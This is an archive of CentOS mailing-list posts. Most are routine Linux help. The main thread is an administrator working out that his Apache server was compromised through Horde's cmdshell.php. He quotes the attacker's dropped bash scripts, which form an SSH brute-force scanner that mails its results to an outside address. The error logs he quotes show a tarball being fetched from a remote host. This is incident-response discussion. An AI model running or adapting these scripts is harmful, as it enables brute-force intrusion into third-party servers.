> I've installed Fedora as a Xen guest (domU) on RHEL 5.4 before.  There
> were a few oddities getting things installed but it worked fine once up
> and running.
>
> Ray
>   



Thanks Ray , i am planning to use KVM this time.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] mail program question

2010-01-22 Thread firdaus linux
QmailRocks, powerful but hadn't develop anymore
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Upgrading from Fedora Core 7 to CentOS 5.4

2010-01-22 Thread firdaus linux
On Tue, Jan 19, 2010 at 8:59 PM, Kaplan, Andrew H. wrote:

>  Hi there --
>
> I need to upgrade one of our systems from its current distribution, Fedora
> Core 7, to the most recent
> version distribution, release 5.4, of the CentOS operating system. Can I do
> an in-place upgrade of the
> operating system without any adverse side-effects? Are there any issues
> that I should be concerned
> with before proceeding? Thanks.
>
I think this isn't upgrade but downgrade, because Centos 5 more compatible
with fedora 6 package.
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] perl question

2010-01-29 Thread linux-crazy
Hi,

 Check line 18. of your code or paste your code so it  will be more
usefull and which version of OS you are running.



On Sat, Jan 30, 2010 at 12:58 AM, Jerry Geis  wrote:
> I am trying to run a perl script that said it needs Net::SMPP
>
> I ran this:
> your_host]# *perl -MCPAN -e shell*
> cpan shell -- CPAN exploration and modules installation (v1.76)
> ReadLine support enabled
> cpan> *install Net::SNMP
>
> seemed to work. no errors reported.
> however when I run perl I still get the same error saying needs
>
>  ./sendmessage.pl
> Can't locate Net/SMPP.pm in @INC (@INC contains:
> /usr/lib64/perl5/site_perl/5.8.8/x86_64-linux-thread-multi
> /usr/lib/perl5/site_perl/5.8.8 /usr/lib/perl5/site_perl
> /usr/lib64/perl5/vendor_perl/5.8.8/x86_64-linux-thread-multi
> /usr/lib/perl5/vendor_perl/5.8.8 /usr/lib/perl5/vendor_perl
> /usr/lib64/perl5/5.8.8/x86_64-linux-thread-multi /usr/lib/perl5/5.8.8 .)
> at ./sendmessage.pl line 18.
> BEGIN failed--compilation aborted at ./sendmessage.pl line 18.
>
> What else do I need?
>
> Jerry
> *
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] pls help about changing network card but assign to another ethx

2010-02-05 Thread linux-crazy
Hi,


 Thoght of sharing this with u will be handy

I was upgrading my workstation yesterday, only the case and harddisks
remained the same. Almost everything went well, even new init ramdisk
wasn't required, but I was stuck on networking for a while. And the
problem was called "eth0_rename". After querying google it was clear
that this is the result of "network device persistency" feature and
the cause is different MAC address assigned to the new eth0 device.
Solution was easy - remove the old records from
/etc/udev/rules.d/70-persistent-net.rules




 And add some custom udev mac binding rules like below

 cat /etc/udev/rules.d/10-redhat-custom-net.rules
##Realtek
KERNEL=="eth*", SYSFS{address}=="00:16:3e:66:20:c7", NAME="eth0"
###Accton
KERNEL=="eth*", SYSFS{address}=="00:16:3e:7e:a1:9c", NAME="eth1"



http://www.gscore.org/blog/index.php/post/2008/12/16/udev-hell

Thanks

On Fri, Feb 5, 2010 at 12:51 AM, adrian kok  wrote:
> Hi
>
> I change eth1 from realtek to dlink but the centos is showing eth2 instead of 
> eth1
>
> In another version of linux, I can change 70-persistent-net.rules but
>
> I check /etc/udev/rules.d/70-persistent-net.rules but it doesn't  have the 
> file 70-persistent-net.rules
>
> please help
>
> Thank you
>
> Send instant messages to your online friends http://uk.messenger.yahoo.com
> ___
> CentOS mailing list
> CentOS@centos.org
> http://lists.centos.org/mailman/listinfo/centos
>
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-02 Thread Linux Advocate

Guys, apache cpus usage is hitting 100% sometimes ( to such an extent that its 
very noticeable)  on a box with just 8 users or so.

i m getting this when i run 'top'. The worrying thing is seeing the work 
'atack' under command


PID USER  PR  NI  VIRT  RES  SHR S %CPU %MEMTIME+  COMMAND
23119 apache15   0   964  556  472 S  0.7  0.0   0:03.68 atack
23479 apache15   0   964  556  472 S  0.7  0.0   0:01.94 atack
22170 apache15   0   964  560  472 S  0.3  0.0   0:05.23 atack
22375 apache15   0   964  560  472 S  0.3  0.0   0:04.21 atack
22858 apache15   0   964  560  472 S  0.3  0.0   0:02.87 atack
22997 apache15   0   964  560  472 S  0.3  0.0   0:04.11 atack
22999 apache15   0   964  560  472 S  0.3  0.0   0:02.22 atack
23007 apache15   0   964  560  472 S  0.3  0.0   0:03.79 atack
23099 apache15   0   964  556  472 S  0.3  0.0   0:02.18 atack
23101 apache15   0   964  556  472 S  0.3  0.0   0:02.48 atack
23108 apache15   0   964  556  472 S  0.3  0.0   0:03.59 atack
23109 apache15   0   964  556  472 S  0.3  0.0   0:02.75 atack
23112 apache15   0   972  504  412 S  0.3  0.0   0:04.70 atack
23115 apache15   0   964  556  472 S  0.3  0.0   0:03.75 atack
23116 apache15   0   964  556  472 S  0.3  0.0   0:02.80 atack
23121 apache15   0   972  504  412 S  0.3  0.0   0:03.79 atack
23384 apache15   0   964  556  472 S  0.3  0.0   0:01.63 atack
23389 apache15   0   964  556  472 S  0.3  0.0   0:03.52 atack
23392 apache15   0   964  556  472 S  0.3  0.0   0:01.61 atack
23397 apache15   0   964  556  472 S  0.3  0.0   0:01.62 atack
23405 apache15   0   964  556  472 S  0.3  0.0   0:03.64 atack

When i 'ps -ef' i can see many lines as below;

apache   24253 23378  0 10:54 ?00:00:00 ./atack 100
apache   24286 23378  0 10:59 ?00:00:00 ./atack 100
apache   24292 23378  0 11:00 ?00:00:01 ./atack 100
apache   24335 23378  0 11:01 ?00:00:00 ./atack 100
apache   24344 23378  0 11:01 ?00:00:00 ./atack 100
apache   24347 23378  0 11:02 ?00:00:00 ./atack 100
apache   24358 23378  0 11:04 ?00:00:00 ./atack 100


Hell, has my centos 5.3 box  been hacked??? Help  !!


  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-02 Thread Linux Advocate

sorry typos amended





Guys, apache's cpu usage is hitting
100% sometimes ( to such an extent that its 
very noticeable) 
on a box ( 2gb ram)  with just 8 users or so. This newver happended before.

i m getting this when i
run 'top'. The worrying thing is seeing the word 'atack' 
under
command


PID USER  PR  NI 
VIRT  RES  SHR S %CPU %MEMTIME+ 
COMMAND
23119 apache15  0  964  556 
472 S  0.7  0.0  0:03.68 atack
23479 apache 
  15  0  964  556  472 S  0.7 
0.0  0:01.94 atack
22170 apache15  0 
964  560  472 S  0.3  0.0  0:05.23 atack
22375 apache15  0  964  560  472 S 
0.3  0.0  0:04.21 atack
22858 apache15 
0  964  560  472 S  0.3  0.0  0:02.87
atack
22997 apache15  0  964  560 
472 S  0.3  0.0  0:04.11 atack
22999 apache 
  15  0  964  560  472 S  0.3 
0.0  0:02.22 atack
23007 apache15  0 
964  560  472 S  0.3  0.0  0:03.79 atack
23099 apache15  0  964  556  472 S 
0.3  0.0  0:02.18 atack
23101 apache15 
0  964  556  472 S  0.3  0.0  0:02.48
atack
23108 apache15  0  964  556 
472 S  0.3  0.0  0:03.59 atack
23109 apache 
  15  0  964  556  472 S  0.3 
0.0  0:02.75 atack
23112 apache15  0 
972  504  412 S  0.3  0.0  0:04.70 atack
23115 apache15  0  964  556  472 S 
0.3  0.0  0:03.75 atack
23116 apache15 
0  964  556  472 S  0.3  0.0  0:02.80
atack
23121 apache15  0  972  504 
412 S  0.3  0.0  0:03.79 atack
23384 apache 
  15  0  964  556  472 S  0.3 
0.0  0:01.63 atack
23389 apache15  0 
964  556  472 S  0.3  0.0  0:03.52 atack
23392 apache15  0  964  556  472 S 
0.3  0.0  0:01.61 atack
23397 apache15 
0  964  556  472 S  0.3  0.0  0:01.62
atack
23405 apache15  0  964  556 
472 S  0.3  0.0  0:03.64 atack

When i 'ps
-ef' i can see many lines as below;

apache  24253
23378  0 10:54 ?00:00:00 ./atack
100
apache  24286 23378  0 10:59 ? 
  00:00:00 ./atack 100
apache  24292 23378  0
11:00 ?00:00:01 ./atack 100
apache 
24335 23378  0 11:01 ?00:00:00
./atack 100
apache  24344 23378  0 11:01 ?   
00:00:00 ./atack 100
apache  24347 23378 
0 11:02 ?00:00:00 ./atack 100
apache 
24358 23378  0 11:04 ?00:00:00
./atack 100


Hell, has my centos 5.3 box  been
hacked??? Help  !!


  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-02 Thread Linux Advocate




> >  
> some google foo shows this is a WINDOWS exploit not a linux one.
> 
> http://www.linuxquestions.org/questions/slackware-14/analyzing-apache-logs-174552/
> ___

yes, william, i saw those links when i googledi too did no think it related 
to me bcos i am on a centos box...



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-02 Thread Linux Advocate

reply below



- Original Message 
> From: John R. Dennison 
> To: CentOS mailing list 
> Sent: Wednesday, June 3, 2009 11:43:46 AM
> Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell
> 
> On Tue, Jun 02, 2009 at 08:23:16PM -0700, Linux Advocate wrote:
> > 
> > Hell, has my centos 5.3 box  been hacked??? Help  !!
> 
> Yes.  Reinstall; fully update components; restore *data*
> from backups (you have backups, right?) and review what
> web packages you have installed and make sure those are
> fully updated also.
> 
> Your box is compromised.  You have no way to gauge the
> severity, so treat it as both a lost cause; nothing on
> it can be trusted at this point.


o  godddddd.

i have a quite a few linux boxes and not even one has been hacked. oh man 
!!

really??? i have to format the box.


  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-03 Thread Linux Advocate

My replies below i m just so down in the dumps nowaaah



- Original Message 
> From: Neil Aggarwal 
> To: CentOS mailing list 
> Sent: Wednesday, June 3, 2009 1:38:05 PM
> Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell
> 

> The original poster stated he did know how what 
> the process was.  He stated he believed the machine
> was being attacked.  He asked for advice from the
> community on how to handle the situation.

yes. this was and is still my understanding. This was what 'top' showed...

PID USER  PR  NI  VIRT  RES  SHR S %CPU %MEMTIME+  COMMAND
23119 apache15   0   964  556  472 S  0.7  0.0   0:03.68 atack
23479 apache15   0   964  556  472 S  0.7  0.0   0:01.94 atack
22170 apache15   0   964  560  472 S  0.3  0.0   0:05.23 atack
22375 apache15   0   964  560  472 S  0.3  0.0   0:04.21 atack
22858 apache15   0   964  560  472 S  0.3  0.0   0:02.87 atack


'ps -ef'  showed 


apache   24253 23378  0 10:54 ?00:00:00 ./atack 100
apache   24286 23378  0 10:59 ?00:00:00 ./atack 100
apache   24292 23378  0 11:00 ?00:00:01 ./atack 100
apache   24335 23378  0 11:01 ?00:00:00 ./atack 100


> The original poster's statments imply it was not put 
> there by an authorized user.

yes , no one but me has access to the machine.

>  Someone does not just
> casually assume a machine has been hacked.  They
> have a reason for suspecting it.

Applications running;

1 - horde groupware webmail edition, just the framework though.
2 - phpmyadmin
3 - postfixadmin
4 - postfix
5 - dovecot
6. fail2ban
7. monit

2 -> 7 i installed from the repos.

The centos box was running 5.2 when i first noticed the 'slowness'. i then 
updated to 5.3 hoping that the problem would go away.

i am not worried abt reinstalling ( i loathe doing it ) but my worry here ( as 
some of you have  accurately pointed out ) is that the 'issue' will repeat 
again bcos i just downt know what happened. I m just surprised that a centos 
box was compromised.

The box is unplugged now. 

Any more ideas?

Regards,
Maco.


  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-03 Thread Linux Advocate





- Original Message 
> From: Anne Wilson 

> On Wednesday 03 June 2009 06:09:37 John R. Dennison wrote:
> > He's running an apache instance on cent5.  He has processes he
> > can not readily identify running under apache named "atack";
> > where does "windows" come into the equation?  
> 
> Several of the links returned by google have the following info:
> 
> IIS WebDAV Exploit, I think one of the agobot worms tries to use it to get
> into Windows boxes.
> 
> Anne


Anne, i m running apache on a centos box. is centos  still susceptible?



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-03 Thread Linux Advocate


> 
> as an aside? did he say if he even looked on the net for anything related to
> this??

i tried googling for 'centos apache atack" but did not get anything 
substantial. 
i tried locating a binary file called ' atack' but got nothing.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-03 Thread Linux Advocate





- Original Message 
> From: John R. Dennison 
> 
> I stand by my previous advice - the box is compromised, can not
> be trusted, and as a responsible admin he should be working on
> re-installing it, evaluating what web-apps he had running that
> led to this in the first place and taking the appropriate steps
> to ensure it does not happen again.
> 
> 


what steps should i take. i was running centos 5.2 fully updated. the web apps  
or daemons i have running are from the repos.
i have other mandriva boxes and they all are ok. i m just so surprised that a 
centos box got compromised.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-03 Thread Linux Advocate

BRUCE U ARE A F*** GENIUS MAN !

u were right brothanx for spending the time on this man

more info below !



- Original Message 
> From: bruce 
> To: linuxhous...@yahoo.com
> Sent: Wednesday, June 3, 2009 9:53:24 PM
> Subject: RE: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell
> 
> hi...
> 
> i've seen a few of your threads on your issue of the 'atack' processes
> running from your web server...
> 
> i'm replying to you offline, as ..
> 
> 
> take a look over your box, and let's see what you have...
> 


as per yr tip i had found a file called atack under this folder /dev/shm/unix 
 even though i could not locate such a file before.
i have now removed that file and am now probing the contents of the 
/dev/shm/unix folder.

[r...@fwgw unix]# pwd
/dev/shm/unix

[r...@fwgw unix]# ls -al
total 4352
drwxr-xr-x 2 apache apache 360 Jun  3 23:47 .
drwxrwxrwt 3 root   root60 Jun  3 00:24 ..
-rwxr-xr-x 1 apache apache   0 May 19 06:02   124.164.find.22
-rwxr-xr-x 1 apache apache   0 Mar 24 22:28   129.135.find.22
-rwxr-xr-x 1 apache apache   0 Mar 24 22:25   129.find.22
-rwxr-xr-x 1 apache apache   0 May 25 13:54   21.168.find.22
-rwxr-xr-x 1 apache apache   12687 May 25 06:16  60.191.find.22
-rw-r--r-- 1 apache apache   0 Jun  3 23:45   83.182.find.22
-rwxr-xr-x 1 apache apache4631 Apr 21 17:50   84.2.find.22
-rwxr-xr-x 1 apache apache   0 May 25 06:17   89.38.find.22
-rwxr-xr-x 1 apache apache2362 May 19 15:28   91.204.find.22
-rwxr-xr-x 1 apache apache 216 May 18  2005   auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41  data.conf
-rwxr-xr-x 1 apache apache   15729 Oct 14  2005  find
-rw-r--r-- 1 apache apache5262 Jun  3 23:45  log
-rwxr-xr-x 1 apache apache 751 May 25 06:33  unix
-rw-r--r-- 1 apache apache   0 Jun  3 23:04   vuln.txt
-rwxr-xr-x 1 apache apache 671 May 25 13:56  x


The contents of  file 'x' are;


#!/bin/bash
echo "[+] PLM prea destept pentru voi : Yuli [+]"
X=0
c=0
while [ $X -le 255 ]
do
c=$RANDOM
let "c %= 255"
echo "[+] Scanam radom class b $1.$c [+]"
./find $1.$c 22
sleep 10
cat $1.$c.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar  $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100 >> log
mail -s $1.$c yuli1989...@yahoo.com < log
rm -rf $1.$c.find.22 ip.conf
echo "[+] Scanner a terminat de scanat !"
echo "[+] Next random class b !"
X=$((X+1))


the contents of the file 'unix' are;


#!/bin/bash
if [ $# != 1 ]; then
echo "[+] Folosim : $0 [b class]"
exit;
fi

echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+]   SSH Brute force scanner : user & password   [+]"
echo "[+]Undernet Channel : #yuli   [+]"
echo "[+][+][+][+][+][+][+] ver 0x10  [+][+][+][+][+][+][+]"
./find $1 22

sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar  $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"


the contents of 'auto' are;

#!/bin/sh
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
echo -n "./assh $brange.$crange ; " >> $file
let crange=crange+1
done


the contents of 'log' are;

[+] No SSH ->www:www:83.246.113.34
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] No SSH ->www:www:83.246.119.41
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10  [ Made By : Gh

Re: [CentOS] setrubleshootd dominating

2009-06-12 Thread Linux Advocate


> On Wed, Jun 3, 2009 at 6:32 PM, Frank M. Ramaekers
> wrote:
> > Anyone have any idea as to why setroubleshootd would be dominating the
> > system:
> >
> >  PID USER  PR  NI  VIRT  RES  SHR S %CPU %MEMTIME+  COMMAND
> >  2371 root  25   0 1884m 1.8g 4100 R 100.2 44.7 680:06.40
> > setroubleshootd
> 
> strace -p And see what it is doing?
> 


does this strace  command exist in centos 5.x?



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-13 Thread Linux Advocate

Matt, great idea I FOUND SOMETHING... pls see below...


>From: Matt 
>To: CentOS mailing list 
>Sent: Thursday, June 4, 2009 4:40:57 AM
>Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell

>PID USER  PR  NI  VIRT  RES  SHR S %CPU %MEMTIME+  COMMAND
>23119 apache15   0   964  556  472 S  0.7  0.0   0:03.68 atack

>When i 'ps -ef' i can see many lines as below;

>apache   24253 23378  0 10:54 ?00:00:00 ./atack 100
>apache   24286 23378  0 10:59 ?00:00:00 ./atack 100

 
>I good tool to have on your linux box that may help, some. 
>http://rkhunter.sourceforge.net/ 
>http://rpmfind.net/linux/rpm2html/search.php?query=rkhunter 
>After installing do.
 >rkhunter --update
>rkhunter -c
 >And see if it finds anything.


I DID FIND SOMETHING...NOT SURE WHAT THOUGH ;)

* Filesystem checks
   Checking /dev for suspicious files...  [ OK ]
   Scanning for hidden files...   [ Warning! ]
---
/etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev
---
Please inspect:  /usr/share/man/man1/..1.gz (gzip compressed data, from Unix, 
max compression)  /dev/.udev (directory)

The contents of the /dev/.udev folder;

drwxr-xr-x  2 root root  540 Jun  8 15:41 db
drwxr-xr-x  2 root root  740 Jun  8 15:41 failed
-rw-r--r--  1 root root4 Jun  8 15:42 uevent_seqnum


The contents of the ../man1/ folder ;

[r...@fwg man1]# ls -al  :.1.gz
-rw-r--r-- 1 root root 40 Jan 22 09:14 :.1.gz

[r...@fwgw man1]# ls -al  [.1.gz
-rw-r--r-- 1 root root 40 Jan 22 09:14 [.1.gz


Anything out of the ordinary?


 Scan results 

MD5 scan
Skipped  <---  WHY SKIPPED ? bcos OS unknown as shown in the NOTE below?

File scan
Scanned files: 342
Possible infected files: 0

Application scan
Vulnerable applications: 0

Scanning took 32 seconds

... end .


NOTE: When we run rkhunter,  rkhunter says the lines below...eventhough i  
installed frm the centos repo? but still it says its an unknown OS

Rootkit Hunter 1.2.9 is running
Determining OS... Unknown
Warning: This operating system is not fully supported!
All MD5 checks will be skipped!

Anything out of the ordinary?


  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] setrubleshootd dominating

2009-06-13 Thread Linux Advocate

replies below...



- Original Message 
> From: Ralph Angenendt 
> To: centos@centos.org
> Sent: Saturday, June 13, 2009 2:46:40 PM
> Subject: Re: [CentOS] setrubleshootd dominating
> 
> Linux Advocate wrote:
> > 
> > > strace -p And see what it is doing?
> > >  
> > 
> > does this strace  command exist in centos 5.x?
> 
> Yes. And in 4 and in 3 and in 2.1 - did you look before asking?
> 
> Ralph

yes i did.

[r...@fwg man1]# strace -p
-bash: strace: command not found
[r...@fwg man1]# strace
-bash: strace: command not found

mayb i have to install something? will check.


  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-13 Thread Linux Advocate





- Original Message 
> From: bruce 
> To: CentOS mailing list 
> Sent: Thursday, June 4, 2009 3:20:24 AM
> Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell
> 
> and if you don't figure out what caused the issue... 

working on it bro
:)

one of the pointers here was to look at alias directives in apache...

when i run httpd -S i get these errors...


[Sat Jun 13 15:14:09 2009] [warn] The Alias directive in 
/etc/httpd/conf.d/phpmyadmin.conf at line 11 will probably never match because 
it overlaps an earlier Alias.
[Sat Jun 13 15:14:09 2009] [warn] The Alias directive in 
/etc/httpd/conf.d/phpmyadmin.conf at line 12 will probably never match because 
it overlaps an earlier Alias.

the contents of /etc/httpd/conf.d/phpmyadmin.conf  are;

#  Web application to manage MySQL
#


  Order Deny,Allow
  Deny from all
  Allow from 127.0.0.1


Alias /phpmyadmin /usr/share/phpmyadmin  <--- 1
Alias /phpMyAdmin /usr/share/phpmyadmin  < --- 2 is this normal ???
Alias /mysqladmin /usr/share/phpmyadmin

Is it normal to have these lines?




> there's not a dammed reason to think you wouldn't do the same thing and get 
> in 
> the same dam situation when you reinstall...
> 

agreed.



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-13 Thread Linux Advocate





- Original Message 
> From: William L. Maltby 
> To: CentOS mailing list 
> Sent: Thursday, June 4, 2009 12:56:22 AM
> Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell
> 
> 
> On Wed, 2009-06-03 at 09:33 -0700, Linux Advocate wrote:
> > 
> 
> > [r...@fwgw unix]# pwd
> > /dev/shm/unix
> > 
> 
> Note that /dev/shm is a tempfs file system. It will be dynamically
> populated. I would expect the attack vector still resides on your system
> somewhere else.
> 


i m looking for it bro...the machine is disconnected frm the net but i have not 
formatted it yet... i really need to know how it happened



  
___
CentOS mailing list
CentOS@centos.org
http://lists.centos.org/mailman/listinfo/centos


Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-13 Thread Linux Advocate

replies below...



- Original Message 
> From: Filipe Brandenburger 
> To: CentOS mailing list 
> Sent: Saturday, June 13, 2009 9:58:51 PM
> Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell

> 
> I suggest you start by looking at Apache's logs, 

Filipe, good idea. will do.

>look for very strange
> URLs hat have nothing to do with the applications you have there, like
> .exe files (IIS attacks) or other .cgi or .php files that will give
> you 404 errors. Also look for things in the error_log file. And then
> look for other accesses from the same IP (assuming it's always from
> the same IP) to files that do exist, this will probably lead you to
> what was used to break in. Continue the investigation from there.

A.  I have found  susicious ip around the dates ( based on the dates of files 
in the atack folder) when i think this break-in could hv hapened

86.126.71.74 <--- frm romania ( i am in singapore )

This ip seemed to have generated the most error messages. they are other 
not-frm-country IPs but way way less errors frm them.

They are many error messages (generated by 86.126.71.74) in the apache error 
log as below;

[Mon May 18 05:39:39 2009] [error] [client 86.126.71.74] PHP Warning:  Cannot 
modify header information - headers already sent in Unknown on line 0, referer:
 http://ip.of.machine.i.removed.for.this.post/horde/admin/cmdshell.php
./x: line 19: log: No such file or directory

[Tue May 19 02:27:32 2009] [error] [client 86.126.71.74] PHP Warning:  Cannot 
modify header information - headers already sent in Unknown on line 0, referer:
 http://60.54.174.146/horde/admin/cmdshell.php?Horde=e20jlll1ds0eudvsdqrsrbb7c2

[Thu May 21 19:29:52 2009] [error] [client 80.179.16.201] script 
'/var/www/html/sys_to_server.php' not found or unable to stat

 http://60.54.174.146/horde/admin/cmdshell.php?Horde=f49bd7r2sb0ut885k3t5vq0ns0
cat: vuln.txt: No such file or directory  

  <--- this vuln.txt is in the /dev/shm/unix/atack folder and also in the 
/var/tmp/unix/atack folder. Was the atacker looking for this file and then 
plant it later? or something like that ?


[Wed May 27 12:20:28 2009] [error] [client 86.126.71.74] PHP Warning:  Cannot 
modify header information - headers already sent in Unknown on line 0, referer:
 http://60.54.174.146/horde/admin/cmdshell.php
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256
Len 255 < 256


What does Len 255 < 256 indicate? Some kind of buffer overflow?

B .Can i conclude that the attacker  came through the   horde framework ( 
cmdshell.php) ? The horde framework was  installed from the centos repo.!!!

[r...@fwg]# yum info horde

Name   : horde
Arch   : noarch
Version: 3.1.7
Release: 1.el5.centos
Size   : 18 M
Repo   : installed
Summary: The common Horde Framework for all Horde modules.
URL: http://www.horde.org/

There are some google hits on cmdshell.php being used to execute arbitrary 
commands? 
There is some exploit called "CmdShell.Horde.ExploitCheck.Decoy"
i havent found more info yet. Any tips on this would be most welcome. 


There is also this line in the error log;

[Fri May 22 18:26:56 2009] [notice] SELinux policy enabled; httpd running as 
context system_u:system_r:httpd_t


Is the line above normal?


C. BUT THE WORST THING OF ALL IS THESE LINES BELOW

Mon May 25 14:46:50 2009] [error] [client 86.126.71.74] PHP Warning:  Cannot 
modify header information - headers already sent in Unknown on line 0, referer:
 
http://my.machine.ip.again/horde/admin/cmdshell.php?Horde=7blkurngfdeqsgorrkqobldem7
--14:47:00--  http://mv.do.am/unix.tgz
Rezolvare mv.do.am... 208.100.61.101
Connecting to mv.do.am|208.100.61.101|:80... conectat.
Cerere HTTP trimisă, se aşteaptă răspuns... 200 OK
Dimensiune: 1614224 (1,5M) [application/octet-stream]
Saving to: `unix.tgz'

 0K .. .. .. .. ..  3% 17,6K 87s
50K .. .. .. .. ..  6% 33,7K 64s
   100K .. .. .. .. ..  9% 33,5K 55s
   150K .. .. .. .. .. 12% 45,6K 48s
   200K .. .. .. .. .. 15% 52,8K 42s
   250K .. .. .. .. .. 19% 50,3K 38s
   300K .. .. .. .. .. 22% 47,9K 35s
   350K .. .. .. .. .. 25% 54,8K 32s
   400K .. .. .. .. .. 28% 48,7K 30s
   450K .. .. .. .. .. 31% 36,9K 28s
   500K .. .. .. .. .. 34% 34,6K 27s
   550K .. .. .. .. .. 38% 32,9K 26s
   600K .. .

Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....

2009-06-13 Thread Linux Advocate

john, replies below...


> Linux Advocate wrote:
> > DID THIS GUY ACTUALLY SAVE A FILE ON MY HARD DISK??? 
> > AA???
> >
> > Was this why rkhunter popped out with this warning?
> >
> > * Filesystem checks
> >Checking /dev for suspicious files...  [ OK ]
> >Scanning for hidden files...   [ Warning! ]
> > ---
> > /etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev
> > ---
> > Please inspect:  /usr/share/man/man1/..1.gz (gzip compressed data, from 
> > Unix, 
